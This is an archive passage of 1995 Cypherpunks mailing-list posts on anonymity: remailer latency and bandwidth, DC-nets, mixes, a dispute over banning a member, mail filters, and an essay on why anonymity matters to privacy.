step in this direction. 
Secrecy will of course have to come before anonymity. I am eagerly awaiting Voice PGP, but unfortuanately can't make the Demo Day meeting. Will someone please report the highlights? > In other words, there are economic as well as technologic reasons I > doubt we'll see low-latency, high-bandwidth audio or video remailers > anytime soon. (As we're seeing now: short messages can get through in > tens of seconds, So, the situation: high-latency, low-bandwidth e-mail remailers the goal: low-latency, high-bandwidth interactive A/V type anonymity, but this seems too far away Perhaps we can tackle the problems of latency and bandwidth seperately. That is, develop 2 sets of anonymity tools: 1. low-latency, low-bandwidth, for use in textual interactions such as MUD and IRC 2. high-latency, high-bandwidth, for non-interactive A/V use, perhaps anonymous TV broadcasting I'm not too familiar with DC-nets, but they can probably be used as tool set #1. (correct me if i'm wrong) How about tool set number 2? > My suspicion is that Alice and Bob cannot defeat traffic analysis > while ~10K bits per second are flowing continuously between them > (audio), at least not until _many_ subnetworks are _much_ > faster. Also, the CPU loads would be great (= costly)). Video is even > further off. Tricks to reduce bandwidth may help. Indeed, Vinge makes use of such a trick in True Names. If I remember correctly, the technology in the story includes the ability to compress full virtualy reality type interactions down to a few hundred bytes per second! (maybe is was thousands, but either way it seems unlikely) Vinge seems to be a stronger believer of compression. There is a similar technology in A Fire Upon the Deep. From tcmay at netcom.com Sat Jan 7 17:00:48 1995 From: tcmay at netcom.com (Timothy C. May) Date: Sat, 7 Jan 95 17:00:48 PST Subject: Latency, bandwidth, and anonymity In-Reply-To: Message-ID: <199501080059.QAA19944@netcom10.netcom.com> Wei Dai wrote: ... 
> Are there any theoritical tools developed especially for this type > of analysis? If so, can anyone provide some references? No, this is too small a community for such tools to exist off-the-shelf. Start with the standard mix papers, mentioned here often. Also, Hal Finney made a first stab at a more careful calculation of just how well remailer's do their job...this was about half a year ago, as I recall. > So, the situation: high-latency, low-bandwidth e-mail remailers > the goal: low-latency, high-bandwidth interactive A/V type anonymity, but > this seems too far away The goal for whom? I find IRC a waste of time, so "anonymous audivisual" is not even on my radar screen of things of interest. I think it's >10 years off. > Perhaps we can tackle the problems of latency and bandwidth seperately. > That is, develop 2 sets of anonymity tools: > 1. low-latency, low-bandwidth, for use in textual interactions such as MUD > and IRC > 2. high-latency, high-bandwidth, for non-interactive A/V use, perhaps > anonymous TV broadcasting Think market. I don't see anyone paying for this until costs drop dramatically. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From weidai at eskimo.com Sat Jan 7 17:08:42 1995 From: weidai at eskimo.com (Wei Dai) Date: Sat, 7 Jan 95 17:08:42 PST Subject: Latency Costs of Anonymity In-Reply-To: <199501072300.PAA25794@jobe.shell.portal.com> Message-ID: On Sat, 7 Jan 1995, Hal wrote: > This technology does sound like mixing could work pretty well to provide > anonymity. 
There is some price in bandwidth and latency but ATM is so > fast that probably several steps of chaining and mixing would be > possible. Naturally such mixes would have to be hardware based due to the > rapid speeds of the packets. So this would be kind of a "souped up" > version of our current email remailer network, with vastly greater > bandwidths and switching speeds. The problem here is that you'll have to do a RSA operation on EACH packet. Pretty hard on the CPU... > I think it may be more useful rather than speaking of "true" anonymity > to think of factor-of-N anonymity. This reflects the bandwidth costs. I > would guess that, if you have a packet-based video converencing system, > that today you could probably get factor-of-2 anonymity with custom > hardware, and perhaps even more than that. I'm not exactly sure what you mean by "factor-of-N". I only used "true" to distiguish it from "trivial" anonymity (such as using a pay phone). Of course, anonymity, like security, can only be relative. > One other point I would make, based on Wei's original post, is that no > doubt anonymity does exact some costs. However this does not mean that > it is uncompetitive. It also may have, in some circumstances, > advantages. People may be more frank and critical when they are shielded > by anonymity. I've read articles about companies which introduce > electornic "suggestion boxes" where people can post anonymously, and > upper management is often shocked at the results. It is too early to > judge how much of a net benefit or harm anonymity will be in general. > > Furthermore, it is likely that the net advantage will differ depending on > the business or organization. At one extreme, a group working with > illegal or restricted technology would probably benefit more from > anonymity. 
I think it was Keith Henson who posted a story here a couple > of years ago that he was working on, involving some kind of underground > protest group which organized itself using crypto anonymity. So it is > really not a question of whether anonymity is good or bad, but rather > whether its costs outweigh its advantages in a particular situation. This is all very true. I guess I'm just lamenting the loss of my ealier, more naive dream that one day everyone will be anonymous (read pseudonymous), and that physical and digital identities will be totally seperate. Wei Dai Who should really start signing his posts but left his key in another computer. From klp at epx.cis.umn.edu Sat Jan 7 17:50:26 1995 From: klp at epx.cis.umn.edu (klp at epx.cis.umn.edu) Date: Sat, 7 Jan 95 17:50:26 PST Subject: Carol Anne Whoever In-Reply-To: Message-ID: <0012f0f4513022117@epx.cis.umn.edu> According to legend, Jonathan Rochkind said: > [I'm beginning to suspect that Carol Anne, and her sysadmin too, are just > tentacles of Detweiler.] Actually (unfortunatly?) I can confirm the fact that Carol Anne, and Mike are >not< Detweiler, CA by personally knowledge, and Mike by reputation. Just thought I'd toss that out for the viewing public, and go back to my 'no comment' stance on the whole rest of the deal... -- Kevin Prigge internet: klp at epx.cis.umn.edu CIS Consultant MaBellNet: (612)626-0001 Computer & Information Services SneakerNet: 152 Lauderdale From weidai at eskimo.com Sat Jan 7 18:02:18 1995 From: weidai at eskimo.com (Wei Dai) Date: Sat, 7 Jan 95 18:02:18 PST Subject: Latency, bandwidth, and anonymity In-Reply-To: <199501080059.QAA19944@netcom10.netcom.com> Message-ID: On Sat, 7 Jan 1995, Timothy C. May wrote: > > Perhaps we can tackle the problems of latency and bandwidth seperately. > > That is, develop 2 sets of anonymity tools: > > 1. low-latency, low-bandwidth, for use in textual interactions such as MUD > > and IRC > > 2. 
high-latency, high-bandwidth, for non-interactive A/V use, perhaps > > anonymous TV broadcasting > > Think market. I don't see anyone paying for this until costs drop > dramatically. Oops, I didn't mean to exhort anyone to actually make the tools, but was just thinking about the feasibilities. (I know, "Cypherpunks write code", not "Cypherpunks convince others to write code." ;) OTOH, I DO think people with anonymity needs will pay for lower latency and/or higher bandwidth (right now probably tool set #1 will have a greater demand, given the heavy use of MUDs and IRC). In the longer term, anonymous communication is in danger of being used only by fringe groups if it falls too much behind the non-anonymous kind in terms of latency and bandwidth (and cost, I guess). Maybe ONLY drug dealers, nuclear terrorists, etc., will use anonymous remailers when full sensory virtual interaction is the must popular way for most people to communicate and remailers are still the only choice for the anonymity-conscious. By then, the remailers themselves will be in danger of being outlawed, or just close down for lack of business. > I find IRC a waste of time, so "anonymous audivisual" is not even on my > radar screen of things of interest. I think it's >10 years off. I think limited virtual interaction can be available on the Internet in 5 years (in prototype), so I sure hope anonymous A/V is not that far off. I know, I know, the market will decide... But second guessing the market can be fun and sometimes profitable. Just look at all those people trying to make money on the stock market. Sorry if I'm hammering the subject to death... 
Wei Dai From hfinney at shell.portal.com Sat Jan 7 18:40:47 1995 From: hfinney at shell.portal.com (Hal) Date: Sat, 7 Jan 95 18:40:47 PST Subject: Latency Costs of Anonymity Message-ID: <199501080241.SAA13329@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- From: Wei Dai > [My idea for ATM mixes] > The problem here is that you'll have to do a RSA operation on EACH > packet. Pretty hard on the CPU... Yes, good point. It might be possible to use a stream model where the separate packets which make up a stream use the same conventional key. This allows the various packets which make up a stream to be identified as such by outsiders, but still if there are a large number of virtual streams going through the network at one time it should be possible to confuse the streams pretty well. ("I've got a crazy idea. Let's cross the streams!" -- Ghostbusters). Then you only need to do the RSA work at setup time, and you need a fast streaming cypher during the conversation. This is how the streaming-packet encryption models like IPSP or Netscape's SSL seem to work. > > I think it may be more useful rather than speaking of "true" anonymity > > to think of factor-of-N anonymity. This reflects the bandwidth costs. I > > would guess that, if you have a packet-based video converencing system, > > that today you could probably get factor-of-2 anonymity with custom > > hardware, and perhaps even more than that. > > I'm not exactly sure what you mean by "factor-of-N". I only used "true" > to distiguish it from "trivial" anonymity (such as using a pay phone). > Of course, anonymity, like security, can only be relative. By "factor-of-N" I meant anonymity where you can only pin the source of a message down to one of N possibilities. It appears to me that many of the costs will be a function of N. It will be relatively easier to cloak your source as one of say 50 possibilities than to make it any of one in a million. 
This is why I suggested that factor-of-2 anonymity would be the easiest. The DC-Net concept would allow two users to share a cryptographically strong pseudo-random stream, and each of them to XOR their video output with the random stream; then these modified outputs from each of them are themselves XOR'd together to produce the joint output. As long as only one sends at a time, the resulting stream is their output, but it is impossible for an outsider to determine which one is sending. The hardware requirements seem quite modest and perhaps would be adequate today even for video. > [My points about limitations on suitability of anonymity] > > This is all very true. I guess I'm just lamenting the loss of my earlier, > more naive dream that one day everyone will be anonymous (read > pseudonymous), and that physical and digital identities will be totally > separate. I don't think we would really expect everyone to be anonymous all of the time. In our personal lives, with friends and family, it doesn't seem appropriate to expect anonymity (although my earlier quotes from Greg Bear's sci fi story suggest differently). But still I think that for people who desire it and are willing to pay the prices, anonymity would indeed be available in many or most electronic communications. So if that is your desire you should be able to achieve it. Hal -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLw9Q1xnMLJtOy9MBAQEhPwH+KSYD4KhA1HOUxqOzdb2WdMuq0i1XTFzH fKMnejTqlKVbFfEnQqfHukwKpH5nFpuN7towJ1o98aGqT1ACxbSjpQ== =2mxw -----END PGP SIGNATURE----- From m00012 at KANGA.STCLOUD.MSUS.EDU Sat Jan 7 19:30:25 1995 From: m00012 at KANGA.STCLOUD.MSUS.EDU (m00012 at KANGA.STCLOUD.MSUS.EDU) Date: Sat, 7 Jan 95 19:30:25 PST Subject: carrol( Message-ID: <0098A1FE.894B5380.788@KANGA.STCLOUD.MSUS.EDU> What is wrong with this person? ban her if you can, that's my opinion.
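The DC-Net round Hal describes in "Latency Costs of Anonymity" above, as an added example that is not part of any list member's post: each participant XORs a pad derived from a shared secret into its output, and XORing all outputs together cancels the pads. The names, the use of SHAKE-256 as the pseudo-random generator and `os.urandom` as a stand-in for key agreement are assumptions; the code also goes beyond the two-user case to any group with pairwise secrets, where every pad still appears exactly twice.

```python
import hashlib
import os
from itertools import combinations


def xor(a: bytes, b: bytes) -> bytes:
    """Byte-wise XOR of two equal-length byte strings."""
    if len(a) != len(b):
        raise ValueError("length mismatch")
    return bytes(x ^ y for x, y in zip(a, b))


def pad(secret: bytes, round_no: int, length: int) -> bytes:
    """Expand a pairwise secret into this round's pad (SHAKE-256 as the PRG).

    Mixing in the round number keeps each pad single-use; reusing a pad
    for two rounds would leak the XOR of the two messages.
    """
    return hashlib.shake_256(secret + round_no.to_bytes(8, "big")).digest(length)


class Participant:
    def __init__(self, name: str):
        self.name = name
        self.shared = {}  # peer name -> 32-byte secret shared with that peer

    def output(self, round_no: int, length: int, message: bytes = None) -> bytes:
        """What this participant puts on the wire in one round."""
        out = bytes(length)
        for secret in self.shared.values():
            out = xor(out, pad(secret, round_no, length))
        if message is not None:
            if len(message) > length:
                raise ValueError("message longer than the round's slot")
            out = xor(out, message.ljust(length, b"\x00"))
        return out


def make_group(names):
    """Create participants and give every pair a fresh shared secret.

    os.urandom stands in for whatever key agreement the pair really used.
    """
    group = [Participant(n) for n in names]
    for a, b in combinations(group, 2):
        secret = os.urandom(32)
        a.shared[b.name] = secret
        b.shared[a.name] = secret
    return group


def run_round(group, round_no, length, sending=None):
    """Run one round; `sending` maps participant name -> message bytes.

    Returns (joint_output, per_participant_outputs). An outside observer
    sees every per-participant output but none of the pads.
    """
    sending = sending or {}
    outputs = {p.name: p.output(round_no, length, sending.get(p.name))
               for p in group}
    joint = bytes(length)
    for wire in outputs.values():
        joint = xor(joint, wire)
    return joint, outputs


if __name__ == "__main__":
    frame = b"video frame 0001"  # constructed sample payload
    pair = make_group(["alice", "bob"])
    for rnd, who in enumerate(("alice", "bob"), start=1):
        joint, wires = run_round(pair, rnd, len(frame), {who: frame})
        print(who, "sends; joint output:", joint)
        for name, wire in wires.items():
            print("   on the wire from", name, ":", wire.hex())
    # Both sending in the same round: the joint output is the XOR of the frames.
    clash, _ = run_round(pair, 3, len(frame),
                         {"alice": frame, "bob": b"other frame 0002"})
    print("collision:", clash.hex())
```

Whoever sends, the observer sees two pseudo-random strings whose XOR is the frame. The collision case at the end is the reason for the "only one sends at a time" condition.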
From root at einstein.ssz.com Sat Jan 7 19:44:19 1995 From: root at einstein.ssz.com (root) Date: Sat, 7 Jan 95 19:44:19 PST Subject: carrol( In-Reply-To: <0098A1FE.894B5380.788@KANGA.STCLOUD.MSUS.EDU> Message-ID: <199501080230.UAA00614@einstein.ssz.com> > > > What is wrong with this person? > > ban her if you can, that's my opinion. > Hi all, For what it is worth, I oppose banning in any manner, shape, or form. There is no moral or ethical justification for it. Take care. From nelson at crynwr.com Sat Jan 7 20:19:31 1995 From: nelson at crynwr.com (Russell Nelson) Date: Sat, 7 Jan 95 20:19:31 PST Subject: carrol( In-Reply-To: <0098A1FE.894B5380.788@KANGA.STCLOUD.MSUS.EDU> Message-ID: Date: Sat, 07 Jan 1995 21:31:45 CST From: m00012 at KANGA.STCLOUD.MSUS.EDU What is wrong with this person? ban her if you can, that's my opinion. Gee, I don't know what everyone is complaining about, because I have: if (from = "carolann at mm.com") then delete in my ~/.elm/filter-rules file. I highly encourage everyone to have their own mail filters, because then you don't have to convince anyone to ban anyone, you just do your own banning. -- -russ http://www.crynwr.com/crynwr/nelson.html Crynwr Software | Crynwr Software sells packet driver support | ask4 PGP key 11 Grant St. | +1 315 268 1925 (9201 FAX) | What is thee doing about it? Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress? From warrior at infinet.com Sat Jan 7 20:52:02 1995 From: warrior at infinet.com (Dave Harvey) Date: Sat, 7 Jan 95 20:52:02 PST Subject: carrol( In-Reply-To: Message-ID: Could you tell me how to do this with Pine? I would love to know how. Regards, Dave > Gee, I don't know what everyone is complaining about, because I have: > > if (from = "carolann at mm.com") then delete > > in my ~/.elm/filter-rules file. I highly encourage everyone to have > their own mail filters, because then you don't have to convince anyone > to ban anyone, you just do your own banning.
___ /\ PGP the Cutting Edge of Privacy. /vvvvvvvvvvvv \-----------------------------------\ | WARRIOR ( | PGP Key Id 0XC554E447D > Magnus Frater Videt Tu `^^^^^^^^^^^^ /===================================/ \/ Finger for PGP 2.6.2 public Key. PGP Fingerprint 15 99 09 6D 11 C8 7C E0 08 C7 E6 95 46 65 FE F0 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= | Dave M. Harvey warrior at infinet.com| | PO Box 151311 dharvey at freenet.columbus.oh.us| | Columbus, OH 43215-8311 fm063 at cleveland.freenet.edu| =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= From pstemari at erinet.com Sat Jan 7 20:53:29 1995 From: pstemari at erinet.com (Paul J. Ste. Marie) Date: Sat, 7 Jan 95 20:53:29 PST Subject: Too Much! Message-ID: <9501080445.AA23191@eri.erinet.com> At 01:16 AM 1/7/95 -0500, L. Todd Masco wrote: >You might want to try reading it from NNTP, via c2.org or hks.net. You >can then use Kill files. At that point, isn't the mailing list simply becoming a newsgroup? For that matter, is there some reason that escapes me why it ISN'T a newsgroup? I suppose the proportion of net.kooks is higher in a newsgroup than a mailing list, but arguably we're ALL net.kooks here. --Paul J. Ste. Marie pstemari at well.sf.ca.us, pstemari at erinet.com From pstemari at erinet.com Sat Jan 7 20:53:49 1995 From: pstemari at erinet.com (Paul J. Ste. Marie) Date: Sat, 7 Jan 95 20:53:49 PST Subject: Soapbox mode on!(but short) Message-ID: <9501080445.AB23191@eri.erinet.com> At 01:22 AM 1/7/95, Carol Anne Braddock wrote: >Dear Paul J. Ste. Marie, > >I was quietly going through my mail after an eight hour layoff. >The first thing you do is lie. > >I have called you a liar. Point Blank! > >And for the honor of this very list, so that there is some >credibility, I shall retrieve from a tin reader the actual >posting, COMPLETE WITH HEADER. Interesting. You did retrieve the message I posted, but not the article from alt.current-events.net-abuse. 
If you want to call me a liar, that's fine, but post something with some relevance. I'm not in the habit of scanning the news hierarchy for spam, and I'm perfectly willing to believe you stopped after ten groups, but that isn't what I recalled seeing in a.c-e.n-a. I could be remembering things wrong, but if that is the case, kindly post something that actually shows the discussion in a.c-e.n-a was otherwise. >And what makes creeps like you going is the ability to continue, >to spread those lies. And now you're sounding like Martha Siegel. My words were: >> The discussion on alt.current-events.net-abuse seemed to indicate that the ^^^^^^^^^^^^^^^^^^ >> claim of "Just 10" above is a slight understatement. The newsgroups seem to >> have been hit alphabetically, and I believe the total count was in the >> hundreds. Am I remembering a.c-e.n-a inaccurately, or have you simply decided not to rebut anything in the forum in which it was presented? All I suggested is that your account bore checking out before people leaped to your defense. An unwillingness to have your story verified speaks for itself. --Paul J. Ste. Marie pstemari at well.sf.ca.us, pstemari at erinet.com From m00012 at KANGA.STCLOUD.MSUS.EDU Sat Jan 7 21:17:19 1995 From: m00012 at KANGA.STCLOUD.MSUS.EDU (m00012 at KANGA.STCLOUD.MSUS.EDU) Date: Sat, 7 Jan 95 21:17:19 PST Subject: carrol( Message-ID: <0098A20D.79070F00.2@KANGA.STCLOUD.MSUS.EDU> I would put her in my killfile, but I don't know if vms has a kill file capability. I use my unix accounts for important email, and do not want to have to sift through the volume I get from the cypherpunks. Otherwise, given that the percentage of interesting posts is going down as a result of carrolann (and perhaps me too now), I think having an elite group capable of banning certain people is perfectly ethical.
mike From rah at shipwright.com Sat Jan 7 21:35:12 1995 From: rah at shipwright.com (Robert Hettinga) Date: Sat, 7 Jan 95 21:35:12 PST Subject: cipher magazine Message-ID: Someone just gave me this URL. It's probably in the cyphernomicon already, but I had fun rooting around in here and thought I'd pass it around to those who haven't seen it yet. http://www.itd.nrl.navy.mil:80/ITD/5540/ieee/cipher/ Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) "There is no difference between someone Shipwright Development Corporation who eats too little and sees Heaven and 44 Farquhar Street someone who drinks too much and sees Boston, MA 02331 USA snakes." -- Bertrand Russell (617) 323-7923 From a015880t at bcfreenet.seflin.lib.fl.us Sat Jan 7 21:43:02 1995 From: a015880t at bcfreenet.seflin.lib.fl.us (Jonathan Nelson) Date: Sat, 7 Jan 95 21:43:02 PST Subject: how to subscribe Message-ID: can someone please mail me where to post to get subscribed Jonathan Nelson a015880t at bcfreenet.seflin.lib.fl.us From jamesd at netcom.com Sat Jan 7 22:13:50 1995 From: jamesd at netcom.com (James A. Donald) Date: Sat, 7 Jan 95 22:13:50 PST Subject: From me to me to you...The Actual Article In-Reply-To: Message-ID: The world is full of self important assholes. You will go mad trying to deal with people like him. Life is too short. From time to time post messages belittling him and his service, and get on with a new service. If you find a reasonably priced 28KB SLIP connection let me know. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From jamesd at netcom.com Sat Jan 7 22:23:30 1995 From: jamesd at netcom.com (James A. 
Donald) Date: Sat, 7 Jan 95 22:23:30 PST Subject: Big vs Little providers (punkette view) In-Reply-To: Message-ID: On Sat, 7 Jan 1995, Carol Anne Braddock wrote: > Yes, at Netcom, I can now probably get much further, much faster. > No I wouldn't subject myself or anyone to Winternet. But I wouldn't > subject a newbie to Netcom either. I did it once and was sorry, too. Actually you cannot. No web pages, and their ftp is really bad. I put my web stuff on http://nw.com/jamesd/ Cheap, good bandwidth, but I have trouble getting usage statistics. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From mkj at october.ducktown.org Sat Jan 7 23:42:50 1995 From: mkj at october.ducktown.org (mkj at october.ducktown.org) Date: Sat, 7 Jan 95 23:42:50 PST Subject: The Value of Anonymity Message-ID: <199501080700.CAA00298@october.ducktown.org> -----BEGIN PGP SIGNED MESSAGE----- The value of anonymity, both on the nets and off, seems to be poorly understood, even among its strongest defenders. The positive value of anonymity is not merely about protecting a few special groups such as sexual-abuse victims and whistleblowers. While these are certainly valuable uses, if I believed that anonymity's positive impact were limited to these outside-the-mainstream groups, then I probably wouldn't accept the benefits of anonymity as outweighing its costs. But in fact, I believe that anonymity has crucially important benefits for nearly everyone. 
There are several good arguments to be made, but in the interest of brevity I'll focus on only one: The explosive development of such personal data industries as targeted marketing and consumer and demographic profiling, have demonstrated that the business community considers personal data to be of great economic value. (There's a parallel observation to be made here about governments, but I won't go into that now.) There are also myriad uses being made of personal data throughout the professions, from labor negotiators to house burglars. It is something of a truism that anyone who knows enough about you can probably find a way to beat you, either legally or illegally, often at great profit to themselves. In an information-age society without extremely strong privacy protections, the chief factor which makes the difference between winners and losers may be how much information each of us has on others, and how much they have on us. Given this degree of economic and social motivation, it is easy to imagine the sort of panopticon which will soon arise on the Internet (and its descendants), unless the strongest possible protections are adopted. (And it is equally easy to imagine who the biggest winners and losers will be.) Relying on government to protect personal privacy is like appointing the fox to guard the henhouse (or, as I seem to recall John Perry Barlow once putting it, "... getting a peeping tom to install your window blinds," or something like that). In addition to the government's own motivations for eroding privacy, all the above economic considerations enter into government through lobbying, desires to maximize tax revenues, fund-raising considerations, and a whole raft of other avenues. Furthermore, the only tools which government could bring to bear would be a complex web of laws and regulations governing the circulation of personal data. 
Such laws and regulations would have to constantly shift in a never ending cat-and-mouse game with business; and what's more, many of these laws and regulations would necessarily conflict with the free speech rights of private organizations. Bottom line: Anonymity is the only available tool which puts control over my own privacy firmly into my own hands, where it belongs, and does so without infringing on anyone's freedom of speech. Certainly there are drawbacks, and anonymity may invite some abuses; but we have survived anonymity's problems in the past, and 'tis better to suffer in the hell we know than to be dragged into a new and hotter one. The only society without any crime is a society without any freedom. My ($.02) conclusion: For preserving meaningful privacy, and for preventing an ugly and probably irreversible transformation of our world, anonymity is the best, perhaps the only viable tool we have. --- mkj -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLw+MZF11Wd4tm8clAQHC3QP8DrxVrUAUM+UKKeKzosFmCXGLkuwJYGDS nE+pFEFIDC8cq7/35h99oIrCszmnkIjwso8PhwlwqRzuxFTZPMI3XuK5wt95tJCL 6Iy2oQ7wjCv+xnL2QjdAGNl68WD0ZhmPv9Q62cvWYjzRXnQJJF7dZiES5l14/NM2 Ij4rLh8AdEo= =OGBF -----END PGP SIGNATURE----- From lcottrell at popmail.ucsd.edu Sun Jan 8 00:08:15 1995 From: lcottrell at popmail.ucsd.edu (Lance Cottrell) Date: Sun, 8 Jan 95 00:08:15 PST Subject: Remailer Abuse Message-ID: -----BEGIN PGP SIGNED MESSAGE----- > >See above. What's the difference between A-->B-->C-->B and A-->B-->C-->D ? >If someone is logging messages and routing, it's less secure, but then so is >the entire remailer system. Prime remailer operators are those who don't >log. > >Maybe message size would tip off snoopers. This can be overcome with minor >tweaking to existing remailer code by tacking on or eliminating padding >to messages. But logging still makes the whole system extremely vulnerable. > >=D.C.
Williams > Message size can best be handled by using a remailer which uses messages which never change size. Mixmaster is now ready for testing. It still does not run on Linux or FreeBSD. I don't know what else it does run on. It works great on Sun machines with gcc. Since it is export restricted, send me mail and I will send you the name of the hidden directory to get the file. -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLw+btVVkk3dax7hlAQFW/QP9GZAIODaKt/VYsDGWUExiY4NUapvnQpZ/ FWtucyqX+4v9JnJv318PaKEs5xqHMcqtdq0fGZn6qNe1k5MbSVBb5wzfclMQm3LY J7b3qv8zymedXpcmM2hm6bCnbpJkRivIjJTCDmg2yMKRH1Uv+Le5eN2haRxw3d76 e51KLqZJbh4= =BKtC -----END PGP SIGNATURE----- -------------------------------------------------- Lance Cottrell who does not speak for CASS/UCSD loki at nately.ucsd.edu PGP 2.6 key available by finger or server. Encrypted mail welcome. Home page http://nately.ucsd.edu/~loki/ Home of "chain" the remailer chaining script. For anon remailer info, mail remailer at nately.ucsd.edu Subject: remailer-help "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche From carolb at barton.spring.com Sun Jan 8 03:15:57 1995 From: carolb at barton.spring.com (carolb) Date: Sun, 8 Jan 95 03:15:57 PST Subject: The Value of Anonymity In-Reply-To: <199501080700.CAA00298@october.ducktown.org> Message-ID: No, sometimes you don't learn till you've made a mistake. As you could see I hurt really badly yesterday. And now, so I can occupy myself quietly for a few days, are there some good files to read so I can understand, and become a good remailer? RegisteredBEllcore Trusted Software Integrity system programmer *********************************************************************** Carol Anne Braddock "Give me your Tired, your Poor, your old PC's..." 
The TS NET REVOKED PGP KEY NO.0C91594D carolb at spring.com carolann at mm.com ************************************************************************ COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM On Sun, 8 Jan 1995 mkj at october.ducktown.org wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > The value of anonymity, both on the nets and off, seems to be poorly > understood, even among its strongest defenders. The positive value of > anonymity is not merely about protecting a few special groups such as > sexual-abuse victims and whistleblowers. While these are certainly > valuable uses, if I believed that anonymity's positive impact were > limited to these outside-the-mainstream groups, then I probably > wouldn't accept the benefits of anonymity as outweighing its costs. > > But in fact, I believe that anonymity has crucially important benefits > for nearly everyone. There are several good arguments to be made, but > in the interest of brevity I'll focus on only one: > > The explosive development of such personal data industries as targeted > marketing and consumer and demographic profiling, have demonstrated > that the business community considers personal data to be of great > economic value. (There's a parallel observation to be made here about > governments, but I won't go into that now.) There are also myriad > uses being made of personal data throughout the professions, from > labor negotiators to house burglars. It is something of a truism that > anyone who knows enough about you can probably find a way to beat you, > either legally or illegally, often at great profit to themselves. > > In an information-age society without extremely strong privacy > protections, the chief factor which makes the difference between > winners and losers may be how much information each of us has on > others, and how much they have on us. 
Given this degree of economic > and social motivation, it is easy to imagine the sort of panopticon > which will soon arise on the Internet (and its descendants), unless > the strongest possible protections are adopted. (And it is equally > easy to imagine who the biggest winners and losers will be.) > > Relying on government to protect personal privacy is like appointing > the fox to guard the henhouse (or, as I seem to recall John Perry > Barlow once putting it, "... getting a peeping tom to install your > window blinds," or something like that). In addition to the > government's own motivations for eroding privacy, all the above > economic considerations enter into government through lobbying, > desires to maximize tax revenues, fund-raising considerations, and a > whole raft of other avenues. > > Furthermore, the only tools which government could bring to bear would > be a complex web of laws and regulations governing the circulation of > personal data. Such laws and regulations would have to constantly > shift in a never ending cat-and-mouse game with business; and what's > more, many of these laws and regulations would necessarily conflict > with the free speech rights of private organizations. > > Bottom line: Anonymity is the only available tool which puts control > over my own privacy firmly into my own hands, where it belongs, and > does so without infringing on anyone's freedom of speech. Certainly > there are drawbacks, and anonymity may invite some abuses; but we have > survived anonymity's problems in the past, and 'tis better to suffer > in the hell we know than to be dragged into a new and hotter one. The > only society without any crime is a society without any freedom. > > My ($.02) conclusion: For preserving meaningful privacy, and for > preventing an ugly and probably irreversible transformation of our > world, anonymity is the best, perhaps the only viable tool we have. 
> > --- mkj > > -----BEGIN PGP SIGNATURE----- > Version: 2.6.2 > > iQCVAwUBLw+MZF11Wd4tm8clAQHC3QP8DrxVrUAUM+UKKeKzosFmCXGLkuwJYGDS > nE+pFEFIDC8cq7/35h99oIrCszmnkIjwso8PhwlwqRzuxFTZPMI3XuK5wt95tJCL > 6Iy2oQ7wjCv+xnL2QjdAGNl68WD0ZhmPv9Q62cvWYjzRXnQJJF7dZiES5l14/NM2 > Ij4rLh8AdEo= > =OGBF > -----END PGP SIGNATURE----- > From hfinney at shell.portal.com Sun Jan 8 09:41:01 1995 From: hfinney at shell.portal.com (Hal) Date: Sun, 8 Jan 95 09:41:01 PST Subject: The Value of Anonymity Message-ID: <199501081741.JAA05815@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- From: mkj at october.ducktown.org > The value of anonymity, both on the nets and off, seems to be poorly > understood, even among its strongest defenders. The positive value of > anonymity is not merely about protecting a few special groups such as > sexual-abuse victims and whistleblowers. While these are certainly > valuable uses, if I believed that anonymity's positive impact were > limited to these outside-the-mainstream groups, then I probably > wouldn't accept the benefits of anonymity as outweighing its costs. These are good points. However I think your presentation is a little too oriented towards the libertarian perspective of distrusting government, and also comes off sounding harshly competitive: > It is something of a truism that > anyone who knows enough about you can probably find a way to beat you, > either legally or illegally, often at great profit to themselves. > > In an information-age society without extremely strong privacy > protections, the chief factor which makes the difference between > winners and losers may be how much information each of us has on > others, and how much they have on us. I think most people don't think so much in terms of winners and losers, of beating and being beaten. Rather, I think it will be more acceptable to couch the issue in simple privacy terms. People do value their privacy. I don't think you have to overly justify the value of privacy. 
A few examples of how little privacy people could actually have in a non-anonymous network of the future should suffice to establish motivation IMO. > Given this degree of economic > and social motivation, it is easy to imagine the sort of panopticon > which will soon arise on the Internet (and its descendants), unless > the strongest possible protections are adopted. I like this phrase! It nicely connotes the transparency of the nets. > Relying on government to protect personal privacy is like appointing > the fox to guard the henhouse (or, as I seem to recall John Perry > Barlow once putting it, "... getting a peeping tom to install your > window blinds," or something like that). In addition to the > government's own motivations for eroding privacy, all the above > economic considerations enter into government through lobbying, > desires to maximize tax revenues, fund-raising considerations, and a > whole raft of other avenues. This is where I think you are getting too libertarian for a broad audience. Also, this wording invites the reader to assume that anonymity will lead to tax avoidance and evading laws. Most people feel that they are paying their own taxes, and if others avoid them then it just increases the burden on themselves. So except to certain selected groups I would avoid playing this angle up. I think your next argument will have wider appeal: > Furthermore, the only tools which government could bring to bear would > be a complex web of laws and regulations governing the circulation of > personal data. Such laws and regulations would have to constantly > shift in a never ending cat-and-mouse game with business; and what's > more, many of these laws and regulations would necessarily conflict > with the free speech rights of private organizations. Be 